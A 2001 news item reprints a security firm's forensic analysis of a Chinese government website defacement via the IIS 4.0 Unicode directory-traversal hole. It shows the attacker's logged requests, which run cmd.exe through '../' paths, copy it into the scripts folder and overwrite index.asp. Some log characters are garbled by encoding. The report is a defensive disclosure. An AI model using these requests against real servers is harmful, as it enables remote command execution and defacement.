(//tvsmo.com)
【大紀元4月21日訊】 我是安絡公司的安全工程師。最近美國黑客因撞机事件對我國一些政府网站發動攻擊，來勢凶猛，我公司安全緊急響應中心已經接到7、8個這樣的案例。

根据我們對這些案例的入侵過程分析，發現美國黑客并沒有采用非常高明的手段，而大多是選擇弱者，找那些安全防護措施做得很少的网站進行攻擊，其中用到了几個危害很大的安全漏洞，下面的一個例子在我國很多网站上都很常見。希望貴网通過互聯网媒體的形式，將類似這樣的入侵案例批露出來，引起大家的警覺，并采取實際措施加以防護。希望互聯网媒體不僅僅熱中于報道攻擊事件，也將一些重點放到安全防護上來，這樣既有新聞价值，又能對讀者提供幫助。謝謝！

關于www.xxxx.xxx.cn的入侵分析

一：事件背景

廣東某市C局所屬网站www.xxx.com.cn (IP: 61.xxx.xxx.17)于2001年4月期間遭到黑客惡意攻擊，造成网站网頁被修改。在此情況下，深圳市安絡科技有限公司于2001年4月17日受某市S局的委托,前往机房現場取證。

二：服務器基本情況以及已獲取資料該服務器操作系統為Windows Nt Server 4.0,安裝有IIS 4.0 ,對外使用FIREWALL屏蔽,只開放WEB服務。我方技術員收集獲得MS IIS 4.0 2001年4月13日至 4月17日HTTPLOG 和FTPLOG。

三：分析

由于該站受入侵后的直接現象為网頁被修改. 并且該站受到PIX FIREWALL防衛,對外只開放80端口,所以初步估計是通過IIS遠程漏洞獲得系統控制權的,IIS 4.0默認下存在ism.dll,msadcs.dll,unicode等獲得网頁修改權限的遠程漏洞。于是我公司技術人員對該服務器的MS IIS 4.0 2001年8月17日至 4月17日HTTPLOG日志文件進行詳細的分析和過濾，得出以下結論：

入侵者利用unicode漏洞,從而可以使用web端口提交執行命令的請求,修改网站主頁。

注：漏洞詳細信息請見： //www.cnns.net/article/db/822.htm

被更改的頁面如下:

以下為入侵者的入侵行為記錄：

其中①：入侵者IP ② ：日期 ③：時間 ④：使用方法 ⑤：被訪問URL

⑥服務器返回號

如果⑥服務器返回號為200則入侵者成功利用unicode漏洞執行了命令。

① ② ③ ④ ⑤ ⑥

152.158.208.65 01-4-17 4:34:19 GET /scripts/..鼆???????./winnt/system32/cmd.exe, /c+dir+c: 500

　　152.158.208.65 01-4-17 4:34:19 GET /scripts/..?../winnt/system32/cmd.exe, /c+dir+c: 500

　　152.158.208.65 01-4-17 4:34:19 GET /scripts/../../winnt/system32/cmd.exe, /c+dir+c: 200

　　152.158.208.65 01-4-17 4:34:19 GET /_vti_bin/../../../../../../winnt/system32/cmd.exe, /c+dir+c: 200

　　152.158.208.65 01-4-17 4:34:19 GET /scripts/…./winnt/system32/cmd.exe, /c+dir+c: 200

　　152.158.208.65 01-4-17 4:34:21 GET /scripts/…./winnt/system32/cmd.exe, /c+dir+c: 200

　　152.158.208.65 01-4-17 4:34:21 GET /scripts/../../winnt/system32/cmd.exe, /c+dir+c: 200

　　152.158.208.65 01-4-17 4:34:21 GET /scripts/../../winnt/system32/cmd.exe, /c+dir+c: 200

　　152.158.208.65 01-4-17 4:34:21 GET /_vti_bin/../../winnt/system32/cmd.exe, /c+dir+c: 200

　　152.158.208.65 01-4-17 4:34:23 GET /scripts/…./winnt/system32/cmd.exe, /c+dir+c: 200

　　152.158.208.65 01-4-17 4:34:23 GET /scripts/../../winnt/system32/cmd.exe, /c+dir+c: 200

　　152.158.208.65 01-4-17 4:34:23 GET /scripts/..?????./winnt/system32/cmd.exe, /c+dir+c: 500

　　152.158.208.65 01-4-17 4:34:23 GET /msadc/../../../../../../winnt/system32/cmd.exe, /c+dir+c: 200

　　152.158.208.65 01-4-17 4:34:25 GET /scripts/..o../winnt/system32/cmd.exe, /c+dir+c: 404

　　152.158.208.65 01-4-17 4:34:25 GET /scripts/..?../..?../mssql7/install/pubtext.bat”+&+dir+c: 403

　　152.158.208.65 01-4-17 4:34:25 GET /scripts/..鴢?????./winnt/system32/cmd.exe, /c+dir+c: 500

　　152.158.208.65 01-4-17 4:34:25 GET /鄝?./winnt/system32/cmd.exe, /c+dir+c: 404

　　152.158.208.65 01-4-17 5:21:17 GET /scripts/…./winnt/system32/cmd.exe, /c+set 502

　　152.158.208.65 01-4-17 5:21:37 GET /scripts/…./winnt/system32/cmd.exe,

　　/c+copy+c:winntsystem32cmd.exe+c:Inetpubscripts1.exe 502

　　152.158.208.65 01-4-17 5:24:32 GET /scripts/…./Inetpub/scripts/1.exe, /c+dir+c: 200

　　152.158.208.65 01-4-17 5:24:38 GET /scripts/…./Inetpub/scripts/1.exe, /c+set 502

　　152.158.208.65 01-4-17 5:24:49 GET /scripts/…./Inetpub/scripts/1.exe,

　　/c+dir+C:InetPubwwwrootfastinfo 200

　　152.158.208.65 01-4-17 5:25:10 GET /scripts/…./Inetpub/scripts/1.exe,

　　/c+echo+rty>C:InetPubwwwrootfastinfoindex.asp 502

　　152.158.208.65 01-4-17 5:25:19 GET /index.asp 200

　　152.158.208.65 01-4-17 5:25:37 GET /scripts/…./Inetpub/scripts/1.exe, 502

　　/c+echo+^^^join+us:+poizonb0x@linuxmail.org^^^^^^^^^^^^^^^^^^^^^^[SecurityNewsPortal.com]^^^^^^^^^>C:InetPubwwwrootfastinf

　　oindex.asp 502

　　152.158.208.65 01-4-17 5:25:43 GET /index.asp 200

從以上分析我們可以清楚的看到在2001年4月17日來自同一IP的入侵者試圖使用unicode漏洞遠程執行命令，達到修改网頁的目的。

攻擊時間為: 2001年4月17日4:34:19－2001年4月17日5:25:43

入侵者IP地址為： 152.158.208.65 來自于美國

四：結論

入侵者是利用Unicode遠程漏洞獲得系統控制權，多次遠程執行命令，了解服務器結构后，修改网站主頁。

鎖定IP為： 152.158.208.65 來自于美國

攻擊時間為： 2001年4月17日4:34:19－2001年4月17日5:25:43

入侵者物理地址為美國

(ChinaByte )(//www.dajiyuan.com)

    相關文章